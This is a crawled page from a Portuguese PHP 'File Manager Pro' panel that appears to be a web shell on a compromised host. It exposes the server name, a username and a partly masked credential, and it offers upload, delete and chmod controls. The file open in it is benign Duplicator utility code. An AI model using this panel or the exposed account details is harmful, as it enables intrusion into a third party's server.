🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_b910f9df / 9bf1****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: class.conf.utils.php
<?php /** * Standard: PSR-2 * * @link http://www.php-fig.org/psr/psr-2 Full Documentation * * @package SC\DUPX */ defined('ABSPATH') || defined('DUPXABSPATH') || exit; /** * In this class all the utility functions related to the wordpress configuration and the package are defined. */ class DUPX_Conf_Utils { /** * * @staticvar null|bool $present * @return bool */ public static function isConfArkPresent() { static $present = null; if (is_null($present)) { $present = file_exists(DUPX_Package::getWpconfigArkPath()); } return $present; } /** * * @staticvar bool $present * @return bool */ public static function isManualExtractFilePresent() { static $present = null; if (is_null($present)) { $present = file_exists(DUPX_Package::getManualExtractFile()); } return $present; } /** * * @staticvar null|bool $enable * @return bool */ public static function shellExecUnzipEnable() { static $enable = null; if (is_null($enable)) { $enable = DUPX_Server::get_unzip_filepath() != null; } return $enable; } /** * * @return bool */ public static function classZipArchiveEnable() { return class_exists('ZipArchive'); } /** * * @staticvar bool $exists * @return bool */ public static function archiveExists() { static $exists = null; if (is_null($exists)) { $exists = file_exists(DUPX_Security::getInstance()->getArchivePath()); } return $exists; } /** * * @staticvar bool $arcSize * @return bool */ public static function archiveSize() { static $arcSize = null; if (is_null($arcSize)) { $archivePath = DUPX_Security::getInstance()->getArchivePath(); $arcSize = file_exists($archivePath) ? (int) @filesize($archivePath) : 0; } return $arcSize; } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar